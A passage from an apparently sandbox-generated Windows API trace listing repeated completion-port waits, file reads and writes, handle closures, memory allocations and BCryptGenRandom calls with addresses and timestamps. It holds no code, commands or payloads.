CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.288] WriteFile (in: hFile=0x3bc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0112.288] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0112.305] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0112.306] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.306] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.306] free (_Block=0x77d7a8) [0112.306] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.306] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.306] free (_Block=0x2071c20) [0112.306] free (_Block=0x2071d30) [0112.306] free (_Block=0x77d8b0) [0112.306] WriteFile (in: hFile=0x3ac, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0112.306] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0112.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.313] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0112.316] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.316] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.316] free (_Block=0x77d7a8) [0112.316] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.316] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.316] free (_Block=0x2071c20) [0112.316] free (_Block=0x2071d30) [0112.316] free (_Block=0x77d8b0) [0112.316] WriteFile (in: hFile=0x13c0, lpBuffer=0x3db04f4*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db04c0) returned 1 [0112.316] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.320] CloseHandle (hObject=0x3ac) returned 1 [0112.321] free (_Block=0x3d70450) [0112.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.321] CloseHandle (hObject=0x13c0) returned 1 [0112.322] free (_Block=0x3db04c0) [0112.326] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.400] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xadc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.400] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.401] CloseHandle (hObject=0x340) returned 1 [0112.408] free (_Block=0x1ff1e60) [0112.408] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.491] CloseHandle (hObject=0x81c) returned 1 [0112.492] free (_Block=0x3ef0008) [0112.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.495] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x820, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0112.495] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.496] CloseHandle (hObject=0x3bc) returned 1 [0112.497] free (_Block=0x3e70008) [0112.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0112.518] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.518] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0112.518] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.518] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.518] free (_Block=0x77d7a8) [0112.518] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.518] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.519] free (_Block=0x2071c20) [0112.519] free (_Block=0x2071d30) [0112.519] free (_Block=0x77d8b0) [0112.519] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.519] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.526] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.526] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0112.526] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.527] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0112.527] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.527] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.527] free (_Block=0x77d7a8) [0112.527] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.527] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.528] free (_Block=0x2071c20) [0112.528] free (_Block=0x2071d30) [0112.528] free (_Block=0x77d8b0) [0112.528] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0112.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.528] CloseHandle (hObject=0x3bc) returned 1 [0112.577] free (_Block=0x1ff1e60) [0112.577] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.581] CloseHandle (hObject=0x81c) returned 1 [0112.584] free (_Block=0x3e70008) [0112.584] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.592] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.593] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0112.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0112.594] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.594] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.594] free (_Block=0x77d7a8) [0112.594] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.594] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.594] free (_Block=0x2071c20) [0112.594] free (_Block=0x2071d30) [0112.595] free (_Block=0x77d8b0) [0112.595] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.595] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.603] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.604] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0112.604] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.604] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0112.604] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.604] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.604] free (_Block=0x77d7a8) [0112.604] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.604] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.605] free (_Block=0x2071c20) [0112.605] free (_Block=0x2071d30) [0112.605] free (_Block=0x77d8b0) [0112.605] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0112.605] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.615] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.615] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0112.616] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0112.616] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0112.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0112.616] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0112.616] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0112.616] free (_Block=0x77d7a8) [0112.616] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0112.616] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0112.617] free (_Block=0x2071c20) [0112.617] free (_Block=0x2071d30) [0112.617] free (_Block=0x77d8b0) [0112.617] WriteFile (in: hFile=0x340, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0112.617] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.639] CloseHandle (hObject=0x81c) returned 1 [0112.646] free (_Block=0x3e70008) [0112.646] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.657] CloseHandle (hObject=0x340) returned 1 [0112.663] free (_Block=0x3ef0008) [0112.663] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.676] CloseHandle (hObject=0x2f4) returned 1 [0112.677] free (_Block=0x3d70450) [0112.677] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.690] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0112.690] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.695] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0112.695] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.697] WriteFile (in: hFile=0x340, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0112.697] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.941] ReadFile (in: hFile=0x2f4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x7e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0112.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0112.941] CloseHandle (hObject=0x2f4) returned 1 [0112.942] free (_Block=0x3d70450) [0112.942] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.192] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.193] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0113.193] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.193] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0113.193] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.193] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.194] free (_Block=0x77d7a8) [0113.194] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.194] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.194] free (_Block=0x2071c20) [0113.194] free (_Block=0x2071d30) [0113.194] free (_Block=0x77d8b0) [0113.194] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.198] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.198] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.209] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.209] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0113.209] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.210] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0113.210] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.210] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.210] free (_Block=0x77d7a8) [0113.210] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.210] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.211] free (_Block=0x2071c20) [0113.211] free (_Block=0x2071d30) [0113.211] free (_Block=0x77d8b0) [0113.211] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0113.211] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.220] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.220] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.220] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0113.221] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0113.221] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0113.221] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0113.221] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0113.221] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0113.221] free (_Block=0x77d7a8) [0113.221] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0113.221] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0113.222] free (_Block=0x2071c20) [0113.222] free (_Block=0x2071d30) [0113.222] free (_Block=0x77d8b0) [0113.222] WriteFile (in: hFile=0x81c, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0113.222] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.232] CloseHandle (hObject=0x340) returned 1 [0113.236] free (_Block=0x3d70450) [0113.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.245] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x8f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0113.245] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.328] CloseHandle (hObject=0x2f4) returned 1 [0113.330] free (_Block=0x1ff1e60) [0113.330] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0113.330] CloseHandle (hObject=0x3bc) returned 1 [0113.331] free (_Block=0x3e70008) [0113.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: 